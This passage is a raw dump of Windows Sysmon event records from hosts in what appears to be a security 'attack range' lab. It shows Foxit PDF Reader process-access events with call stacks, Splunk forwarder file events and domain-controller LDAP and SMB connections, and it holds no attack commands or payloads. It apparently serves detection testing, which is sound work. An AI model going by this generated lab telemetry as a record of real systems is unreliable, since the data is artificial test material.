Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+837ce(wow64)|C:\Windows\system32\explorerframe.dll+81e64(wow64)|C:\Windows\system32\explorerframe.dll+87703(wow64)|C:\Windows\system32\explorerframe.dll+89a37(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.281{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+837ce(wow64)|C:\Windows\system32\explorerframe.dll+81e64(wow64)|C:\Windows\system32\explorerframe.dll+87703(wow64)|C:\Windows\system32\explorerframe.dll+89a37(wow64)|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+d30a(wow64) 10341000x800000000000000040352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.281{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+837ce(wow64)|C:\Windows\system32\explorerframe.dll+81e64(wow64) 10341000x800000000000000040351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.281{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+837ce(wow64)|C:\Windows\system32\explorerframe.dll+81e64(wow64)|C:\Windows\system32\explorerframe.dll+87703(wow64) 10341000x800000000000000040350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.269{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.269{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+1ccb|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEFEAE5)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\wow64win.dll+11214|C:\Windows\System32\wow64win.dll+31ed0|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+18260|C:\Windows\System32\wow64win.dll+363dd|C:\Windows\SYSTEM32\ntdll.dll+a9834|C:\Windows\System32\wow64win.dll+f534|C:\Windows\System32\wow64win.dll+4e07 10341000x800000000000000040348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.223{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.223{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64)|C:\Windows\system32\explorerframe.dll+9217c(wow64)|C:\Windows\system32\explorerframe.dll+8eecd(wow64)|C:\Windows\System32\COMDLG32.dll+3460f(wow64) 10341000x800000000000000040346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.223{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64) 10341000x800000000000000040345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.223{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+7d5a5(wow64)|C:\Windows\system32\explorerframe.dll+7d526(wow64)|C:\Windows\system32\explorerframe.dll+7ee52(wow64) 10341000x800000000000000040344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.217{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1301b1(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+9a740(wow64)|C:\Windows\system32\explorerframe.dll+89593(wow64)|C:\Windows\system32\explorerframe.dll+892ca(wow64)|C:\Windows\system32\explorerframe.dll+8813f(wow64)|C:\Windows\system32\explorerframe.dll+88204(wow64)|C:\Windows\System32\SHELL32.dll+c262b(wow64) 10341000x800000000000000040343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.217{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+13012a(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+9a740(wow64)|C:\Windows\system32\explorerframe.dll+89593(wow64)|C:\Windows\system32\explorerframe.dll+892ca(wow64)|C:\Windows\system32\explorerframe.dll+8813f(wow64)|C:\Windows\system32\explorerframe.dll+88204(wow64)|C:\Windows\System32\SHELL32.dll+c262b(wow64) 10341000x800000000000000040342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.217{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+9a740(wow64)|C:\Windows\system32\explorerframe.dll+89593(wow64) 10341000x800000000000000040341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.217{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+130113(wow64)|C:\Windows\System32\SHELL32.dll+1300c9(wow64)|C:\Windows\System32\SHELL32.dll+12fded(wow64)|C:\Windows\System32\SHELL32.dll+12fd97(wow64)|C:\Windows\System32\SHELL32.dll+12f997(wow64)|C:\Windows\system32\explorerframe.dll+9a740(wow64)|C:\Windows\system32\explorerframe.dll+89593(wow64)|C:\Windows\system32\explorerframe.dll+892ca(wow64) 23542300x800000000000000040340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:18.018{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50CF769BB668ACFA56E2E02760E3CB5A,SHA256=470ABF1FAD820E979FA40C9CBFD150F8950E16FA73FDE6D99FC43614CF49BFBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015431Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:19.307{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2373E5A0A920302D1B24310AED5262C,SHA256=87A3B87CF037CA381A2910AF46D242194AD089C26EECA8D0193A7E1BB1C4082F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000040406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.846{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56247-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.846{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56247-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.832{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56246-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.832{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56246-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000040402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.818{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56245-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 354300x800000000000000040401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:17.818{FE4C2B44-D9F1-63C7-0100-00000000AF02}4SystemNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56245-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local445microsoft-ds 23542300x800000000000000040400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:19.513{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58599B16349701396735E3ACD9AB330C,SHA256=29A29DA8DD5E91E62FEF9793AB5031EDCA6B7280C1F67CE3325882792DE9EC78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:19.513{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=984F63504E4B8FAF58707F3B0D74A751,SHA256=D3F579476DC7D87F26E59E05290584723299594BE587E9CA7A5503AB677A5CD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:19.145{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=44720365740B1D57E3DCC2FD521A540D,SHA256=D956064C4C93C74D4991781C180926CA082E1F4D0141C39B9331A1358C2BD9A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015432Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:20.393{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD3446131CDEDA9C3BDA527C4BA1D693,SHA256=28042B3E9C9F22550BFAB97FD0C6017823740F1AC2759AE1A70AE5E43D341ED5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.991{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B47143798376C062EDB2CF8C7FFBD5E,SHA256=A69C7067DA0F07B780F6EA49A762E67E7F59BE062121D8744D3789E96C35020C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:20.889{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF 